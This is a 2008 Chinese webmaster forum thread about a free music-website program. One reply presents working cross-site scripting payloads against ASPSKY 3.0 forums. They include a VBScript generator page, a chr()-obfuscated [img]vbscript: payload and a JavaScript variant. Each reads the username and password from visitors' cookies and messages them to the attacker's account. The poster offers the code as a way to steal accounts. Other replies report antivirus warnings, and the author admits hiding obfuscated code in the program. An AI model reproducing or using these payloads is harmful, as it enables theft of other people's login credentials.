落伍者站长论坛 » 免费代码及编程交流 » [原创申精] NB音乐网程序提供下载，落伍首发，[2008.2.4更新]

拾荒猫 发表于 2008-1-21 01:39

我操,卡吧报毒[attach]19293[/attach]

[[i] 本帖最后由 拾荒猫 于 2008-1-21 01:43 编辑 [/i]]

可柔 发表于 2008-1-21 01:41

完美的解决跨站脚本的COOKIE弹框框的问题     
先头看到欲望之翼的self.window的办法
其实我一直有个从来没给任何人说的办法:
玩了好久了公布了呵呵:
<html>
<script language=vbs>
sub changeq()
if form1.loc.value="" or form1.who.value="" then
msgbox "没有加入地址或用户名?"
exit sub
end if
loc=form1.loc.value
user=form1.who.value
str="[img]vbscript:execute("on error resume next: call document.body.inse
rtAdjacentHTML(""beforeEnd"",""<div style=display:none&
gt;<iframe id=sendmessage></iframe></div>""):call se
ndmessage.window.open(""" & loc & "/messanger.asp?action=send&touser="
& user & "&title=""+mid(document.cookie,instr(lcase(document.cookie),
""password"")+9,10)+""&message=""+""I am a goo
d boy"",""_self"")  ")[/img]"
form1.area.value=str
end sub

</script>
<body>
<FONT SIZE=7 COLOR=RED>ASPSKY 3.0 偷号器---C.Z.Y原创</FONT>
<form name=form1>
设置发送地址:<input type=text name=loc size=50><br>
▲注意发送地址形如:[url]http://www.nnit30.com/newbbs[/url](newbbs是网站中论坛的安装目录
最后
不用加/)<br>
发送的用户名:<input type=text name=who size=20>-------------
<input type=button name=change value=生成代码 onclick=changeq()><br>
生成的代码:)<textarea name=area rows=10 cols=100></textarea>
</form>
</body>
</html>

搞了大半天的结果，偷aspsky 3.0 密码的东东把下面的代码改一改
然后发到你的贴子里，只要有人看你的贴子他的密码就自动发到你的在
论坛上的邮箱里了，爽吧，其实我的是用VBScript写的snwcwt用javascript
写的没有双引号的问题而且可以同时写几行代码所以要实用一些！！
不过效果都差不多哈：）（注意要先把下面的东东改一下发送的地址然
后全部写在一行里）
[img]vbscript:window.open(chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&ch
r(47)&chr(119)&chr(119)&chr(119)&chr(46)&chr(110)&chr(110)&chr(105)&chr(116)&chr
(51)&chr(48)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(110)&chr(101)&chr(119
)&chr(98)&chr(98)&chr(115)&chr(47)&chr(109)&chr(101)&chr(115)&chr(115)&chr(97)&c
hr(110)&chr(103)&chr(101)&chr(114)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr
(97)&chr(99)&chr(116)&chr(105)&chr(111)&chr(110)&chr(61)&chr(115)&chr(101)&chr(1
10)&chr(100)&chr(38)&chr(116)&chr(111)&chr(117)&chr(115)&chr(101)&chr(114)&chr(6
1)&chr(99)&chr(122)&chr(121)&chr(38)&chr(116)&chr(105)&chr(116)&chr(108)&chr(101
)&chr(61)&chr(104)&chr(105)&chr(104)&chr(105)&chr(38)&chr(109)&chr(101)&chr(115)
&chr(115)&chr(97)&chr(103)&chr(101)&chr(61)+chr(80)&chr(97)&chr(115)&chr(115)&ch
r(58)+mid(lcase(document.cookie),instr(lcase(document.cookie),chr(112)+chr(97)+c
hr(115)+chr(115)+chr(119)+chr(111)+chr(114)+chr(100))+9,len(document.cookie)-ins
tr(lcase(document.cookie),chr(112)+chr(97)+chr(115)+chr(115)+chr(119)+chr(111)+c
hr(114)+chr(100))+9)+chr(32)+chr(32)+chr(32)+chr(32)+chr(78)&chr(97)&chr(109)&ch
r(101)&chr(58)+mid(lcase(document.cookie),instr(lcase(document.cookie),chr(117)+
chr(115)+chr(101)+chr(114)+chr(110)+chr(97)+chr(109)+chr(101))+9,(instr(lcase(do
cument.cookie),chr(117)+chr(115)+chr(101)+chr(114)+chr(99)+chr(108)+chr(97)+chr(
115))-1)-instr(lcase(document.cookie),chr(117)+chr(115)+chr(101)+chr(114)+chr(11
0)+chr(97)+chr(109)+chr(101))-9),chr(49)&chr(49),chr(116)&chr(111)&chr(112)&chr(
61)&chr(50)&chr(48)&chr(48)&chr(48)&chr(44)&chr(108)&chr(101)&chr(102)&chr(116)&
chr(61)&chr(50)&chr(48)&chr(48)&chr(48)&chr(44)&chr(104)&chr(101)&chr(105)&chr(1
03)&chr(104)&chr(116)&chr(61)&chr(49)&chr(44)&chr(119)&chr(105)&chr(100)&chr(116
)&chr(104)&chr(61)&chr(49))[/img]

简化形式：window.open(打开的连接,窗体名,窗体大小设置)
打开的连接:
第一部份：[url]http://xxx.xxx.xxx.xxx/xxxx/messanger.asp?action=send.....[/url]
对应编码为


chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(119)&
chr(119)&chr(119)&chr(46)&chr(110)&chr(110)&chr(105)&chr(116)&chr(51)&chr(48)&ch
r(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(110)&chr(101)&chr(119)&chr(98)&chr(9
8)&chr(115)&chr(47)&chr(109)&chr(101)&chr(115)&chr(115)&chr(97)&chr(110)&chr(103
)&chr(101)&chr(114)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(97)&chr(99)&ch
r(116)&chr(105)&chr(111)&chr(110)&chr(61)&chr(115)&chr(101)&chr(110)&chr(100)&ch
r(38)&chr(116)&chr(111)&chr(117)&chr(115)&chr(101)&chr(114)&chr(61)&chr(99)&chr(
122)&chr(121)&chr(38)&chr(116)&chr(105)&chr(116)&chr(108)&chr(101)&chr(61)&chr(1
04)&chr(105)&chr(104)&chr(105)&chr(38)&chr(109)&chr(101)&chr(115)&chr(115)&chr(9
7)&chr(103)&chr(101)&chr(61)

不同的网站要自已改注意在哪儿结束同时还有发到的用户名都在这儿改
对于编码看如下代码:


<html>
<script language=vbs>
sub main()
base=form1.text1.value
for i=1 to len(base)
aa=asc(mid(base,i,1))
document.write "chr(" & aa & ")" & "&"
next
end sub
</script>
<body ><form name=form1><table>
<tr><td>
<input type=text name=text1 size=40><br>
<input type=button name=button1 onclick=main() value=change>
</td></tr>
</table></form></body></html>

第二部份:为提取的COOKIE中的用户名和密码

------------------------再来一个js的放便学习----------------------------------

[img]javascript:eval('var myCookie=document.cookie;var iUser0=myCookie.indexOf(\
'username=\');var iUser1=myCookie.indexOf(\'&\',iUser0);if(iUser1==-1) iUser1=my
Cookie.length;var username=myCookie.substring(iUser0+9,iUser1);var iPW0=myCookie
.indexOf(\'password=\');iPW1=myCookie.indexOf(\'&\',iPW0);if(iPW1==-1) iPW1=myCo
okie.length;var password=myCookie.substring(iPW0+9,iPW1);document.body.insertAdj
acentHTML(\'BeforeEnd\',\'<div style=display:block><iframe id=sendmessage src=me
ssanger.asp?action=new&touser=snwcwt></iframe></div>\');sendmessage.window.docum
ent.location=\'[url]http://www.nnit30.com/newbbs/messanger.asp?action=send&touser=snw[/url]
cwt&title=\'+username+\'的密码&message=username=\'+username+\'    password=\'+pa
ssword+\'\';')[/img]

怎么回事 晕

hikaru 发表于 2008-1-21 05:59

顶你！！好东西

jin.lee 发表于 2008-1-21 09:06

[quote]原帖由 [i]可柔[/i] 于 2008-1-21 01:41 发表 [url=http://www.im286.com/redirect.php?goto=findpost&pid=23551933&ptid=2358501][img]http://www.im286.com/images/common/back.gif[/img][/url]
完美的解决跨站脚本的COOKIE弹框框的问题     
先头看到欲望之翼的self.window的办法
其实我一直有个从来没给任何人说的办法:
玩了好久了公布了呵呵:


sub changeq()
if form1.loc.value="" or form1.w ... [/quote]

呵呵 发表于 2008-1-21 09:25

偶顶顶

齐爱 发表于 2008-1-21 12:44

支持。很强大。:ohh:

βΟβ 发表于 2008-1-21 16:28

:o :o hah  `

cntest521 发表于 2008-1-21 17:03

有木马

二叉树 发表于 2008-1-21 17:53

:ohh: :ohh:

Crazycreator 发表于 2008-1-21 17:56

不敢用。。。木马怕怕

披着狼皮的羊 发表于 2008-1-21 20:13

分流:
[url]http://www.chinacode.com/files/ChinaCodeFile933.shtml[/url]

nb99.net 发表于 2008-1-21 21:00

网上去搜一下ASP的chr()函数作用，然后将那一串chr()解开看一下，就知道是什么了。知道了的请不要说出来，我用这种方法是对付那种用批量替换，将本站网址改成自己网址，然后当作自己程序发布的菜鸟用的。另外不知大家发现没有，我很多变量和函数名全部用 NB 开头，也是给上述菜鸟是增加一些修改难度。
本人保证，有毒死全家。

gxn2000 发表于 2008-1-22 12:54

把广告更改方法共享了 就好了

可惜

禁止登陆 发表于 2008-1-22 13:47

可以

XYII 发表于 2008-1-22 14:00

支持下

linkeronline 发表于 2008-1-22 14:38

相当不错

nb99.net 发表于 2008-1-22 18:33

关于修改广告，如果您懂ASP就会自已修改，如果不懂也没关系，年后我会把所有注释加上的。

gxn2000 发表于 2008-1-23 15:01

[quote]原帖由 [i]nb99.net[/i] 于 2008-1-22 18:33 发表 [url=http://www.im286.com/redirect.php?goto=findpost&pid=23583623&ptid=2358501][img]http://www.im286.com/images/common/back.gif[/img][/url]
关于修改广告，如果您懂ASP就会自已修改，如果不懂也没关系，年后我会把所有注释加上的。 [/quote]
支持
另 能不能再改下
把所有访问页面都生成下 这个估计就大有前途了

nb99.net 发表于 2008-1-23 17:38

[quote]原帖由 [i]gxn2000[/i] 于 2008-1-23 15:01 发表 [url=http://www.im286.com/redirect.php?goto=findpost&pid=23599984&ptid=2358501][img]http://www.im286.com/images/common/back.gif[/img][/url]

支持
另 能不能再改下
把所有访问页面都生成下 这个估计就大有前途了 [/quote]
汗，我不知道一共有多少歌曲，多少歌词，多少页面，全部生成不知道要用多大的硬盘。

gxn2000 发表于 2008-1-23 18:45

回复 39楼 的帖子

:ohh:
这个倒是没有考虑
呵呵

查看完整版本: [原创申精] NB音乐网程序提供下载，落伍首发，[2008.2.4更新]